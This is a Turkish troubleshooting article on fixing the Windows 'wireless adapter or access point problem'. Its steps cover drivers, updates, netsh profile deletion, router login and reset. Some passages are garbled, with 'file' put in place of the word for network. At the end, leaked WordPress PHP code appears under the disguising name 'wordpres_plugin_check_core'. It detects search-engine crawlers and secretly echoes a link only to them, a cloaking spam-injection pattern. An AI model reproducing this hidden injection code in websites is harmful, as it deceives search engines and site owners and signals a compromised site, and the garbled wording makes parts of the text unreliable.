Sıradaki içerik:

Samsung Galaxy S2'de Android 11 Deneyimi

e
sv

Kablosuz Bağdaştırıcı veya Erişim Noktası Sorunu, Çözümleri

20 Aralık 2020 21:17
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

İnternet sağlayıcınız tarafından evinize getirilen internet hattı, modem ve router gibi bir yönlendirici yardımıyla, kablosuz olarak kullanabileceğiniz bir ağa dönüşür. Bağlantı sırasında ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ gibi sorunlarla karşılaşabilirsiniz. Windows 7 ve Windows 10 işletim sistemine sahip dizüstü bilgisayarlarda ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ daha sık görülebilir.

Bu soruna ufak kullanıcı hataları sebep olabileceği gibi, biraz daha uğraş gerektiren nedenler de olabilir. Farklı nedenlere bağlı olsa da ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ için kullanabileceğiniz alternatif çözüm yöntemleri bulunuyor. Sorunun nedenini bilmiyorsanız, yöntemleri sırayla deneyebilirsiniz.

‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ çözüm yöntemleri:

Yöntem #1: Wi-Fi bağlantı şifrenizi kontrol edin.Yöntem #2: Kablolu bağlantıyı kullanın.Yöntem #3: Windows güncellemelerini kontrol edin.Yöntem #4: Ağ sürücünüzün etkin olup olmadığını kontrol edin.Yöntem #5: Ağ sürücülerini güncelleyin.Yöntem #6: Antivirüs yazılımınızı devre dışı bırakınYöntem #7: Ağ profilinizi yeniden yapılandırın.Yöntem #8: Ağ adınızı ve şifrenizi değiştirin.Yöntem #9: Yönlendiriciyi sıfırlayın.

Yöntem #1: Wi-Fi bağlantı şifrenizi kontrol edin:

wifi şifre

Özellikle yeni bir Wi-Fi ağına bağlandığınız zaman yanlış şifre girmeniz son derece normal bir durum. Genel olarak şifrelerin oldukça karmaşık olduğunu düşünürsek, ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’na yanlış şifre sebep olmuş olabilir. Ağ ile bağlantınızı keserek şifreyi yeniden girin. Klavye ile ilgili bir problem olup olmadığından emin olmak için farklı bir uygulamayı kullanabilirsiniz. 

Yöntem #2: Kablolu bağlantıyı kullanın:

ethernet kablosu

Bu yöntem ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ için bir çözüm değil ancak öbür yöntemler için internet bağlantısına ihtiyacınız olacak. Bu nedenle geçici bir çözüm olarak internete kablo ile bağlanabilirsiniz. Genel olarak yönlendirici cihazın kutusundan bir tane ethernet kablosu çıkacaktır. Eğer yoksa müsait fiyata bir tane bulabilirsiniz.

Yöntem #3: Windows güncellemelerini kontrol edin:

Adım #1: Windows tuşuna basın.Adım #2: Ayarlar butonuna tıklayın.Adım #3: Buradan Güncelleştirme ve Güvenlik sayfasını açın.Adım #4: Windows Update sayfasını açın.Adım #5: Güncelleştirmeleri Denetle butonuna tıklayın.Adım #6: Eğer varsa güncellemeleri yükleyin.Adım #7: Bilgisayarı yeniden başlatın.Adım #8: ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ devam ediyor mu kontrol edin.

windows güncelleme

Pek fazla soruna olduğu gibi ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’na da güncel olmayan Windows işletim sistemi sebep oluyor olabilir. Böyle bir durumun önüne geçmek için otomatik güncelleştirmeleri aktif hale getirebilir ya da düzenli aralıklarla güncelleme kontrolü yapabilirsiniz.

Yöntem #4: Ağ sürücünüzün etkin olup olmadığını kontrol edin:

Adım #1: Windows tuşu + X kombinasyonunu tuşlayın.Adım #2: Aygıt Yöneticisi’ne tıklayın.Adım #3: Ağ Bağdaştırıcıları sekmesini genişletin.Adım #4: Ağ sürücünüze çift tıklayın.Adım #5: Aygıt durumunda “Bu cihaz düzgün çalışıyor” yazmalı.Adım #6: Eğer yazmıyorsa Etkinleştir butonuna tıklayın.Adım #7: Bilgisayarı yeniden başlatın.Adım #8: ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ devam ediyor mu kontrol edin.

ağ sürücüsü

Ağ sürücünüz bir nedenden ötürü pasif hale gelmiş ve bu hal ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’na sebep olmuş olabilir. Yukarıdaki adımları izleyerek sürücüyü yeniden etkinleştirmeniz mümkün.

Yöntem #5: Ağ sürücülerini güncelleyin:

Adım #1: Windows tuşu + X kombinasyonunu tuşlayın.Adım #2: Aygıt Yöneticisi’ne tıklayın.Adım #3: Ağ Bağdaştırıcıları sekmesini genişletin.Adım #4: Ağ sürücünüz üzerinde sağa tıklayın.Adım #5: Sürücüyü Güncelleştir seçeneğine tıklayın.Adım #6: Sürücüleri Otomatik Olarak Ara adımı ile devam edin.Adım #7: Güncelleme sonrası bilgisayarı yeniden başlatın.Adım #8: ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ devam ediyor mu kontrol edin.

ağ sürücü güncelleme

Güncel olmayan file sürücüleri de ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’na sebep olabilir. Yukarıdaki adımları izleyerek sürücüyü güncelleyebilir ya da sürücüyü kaldırıp bilgisayarı yeniden başlatarak sürücüyü yeniden yükleme yöntemini tercih edebilirsiniz. 

Yöntem #6: Antivirüs yazılımınızı devre dışı bırakın:

antivirüs

Antivirüs yazılımları, yüklü oldukları cihazları olası tehditlerden korumak için bazı kısıtlama işlemleri yapabilirler. Bu kısıtlamalar sonucu ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ gibi sorunlar ortaya çıkabilir. Antivirüs yazılımınızı devre dışı bırakın ve sorunun devam edip etmediğini kontrol edin. Eğer problem çözüldüyse alternatif antivirüs yazılımlarını kullanmayı tercih edebilirsiniz.

Yöntem #7: Ağ profilinizi yeniden yapılandırın:

Adım #1: Windows arama çubuğuna cmd yazın ve aratın.Adım #2: Buradan Komut İstemi ekranını yönetici olarak çalıştırın.Adım #3: Komut İstemi ekranına netsh wlan delete profile name=xx yazın ve Enter’a basın.xx yerine kablosuz file adınızı yazın.Adım #4: Ağ profiliniz silindi.Adım #5: Ağa yeniden bağlanın ve yapılandırın.Adım #6: Bilgisayarı yeniden başlatın.Adım #7: ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ devam ediyor mu kontrol edin.

komut istemi ekranı

Kablosuz file profilinizde yaşanmış olabilecek bir hata kaynaklı olarak ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ oluşabilir. Bu nedenle ağ profilinizi silerek yeniden yapılandırmak, bu sorunun çözümü için kullanabileceğiniz etkili yöntemlerden bir tanesidir. 

Yöntem #8: Ağ adınızı ve şifrenizi değiştirin:

Adım #1: İnternet tarayıcınızın adres çubuğuna 192.168.1.1 yazın ve Enter’a basın.Eğer sayfa açılmıyorsa yönlendirici marka ve modeliniz ile arama yaparak arayüz sayfanızın nasıl açıldığını öğrenebilirsiniz.Adım #2: Açılan file sayfasına kullanıcı adını ‘admin’, şifresini ise ‘password’ yazarak giriş yapın.Eğer giriş yapamadıysanız internet servis sağlayıcınız ile iletişime geçin.Adım #3: Ayarlar sayfası üzerinden yeni bir file adı ve şifresi atayın.Adım #4: Ağa bağlanın.Adım #5: Bilgisayarı yeniden başlatın.Adım #6: ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ devam ediyor mu kontrol edin.

wifi adı, şifre

Yeni bir file adı ve şifresi atamak kolay bir işlem olsa da ‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ çözümü için kullanabileceğiniz etkili yöntemlerden bir tanesidir. Her yönlendiricinin arayüzü farklı olabilir, bu nedenle problem yaşadığınız durumda internet servis sağlayıcınız ile iletişime geçebilirsiniz.

Yöntem #9: Yönlendiriciyi sıfırlayın:

modem, router, yönlendirici

‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ yanlış yapılandırılmış olan yönlendirici kaynaklı olabilir. Bu nedenle yönlendiriciyi sıfırlamak etkili bir seçenektir. Sıfırlama işlemini modem ya da router üzerinde bulunan sıfırlama tuşu ile yapabilirsiniz. Eğer yoksa file sayfanızın arayüzü üzerinden sıfırlama işlemini gerçekleştirebilirsiniz.

‘Kablosuz bağdaştırıcı veya erişim noktası sorunu’ farklı nedenlerle ve daha fazla dizüstü bilgisayarlarda ortaya çıkan bir durumdur. Nedeni ne olursa olsun, yukarıdaki yöntemleri sizin için kolay olandan zor olana doğru uygulayarak mutlak çözüme ulaşabilirsiniz.

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');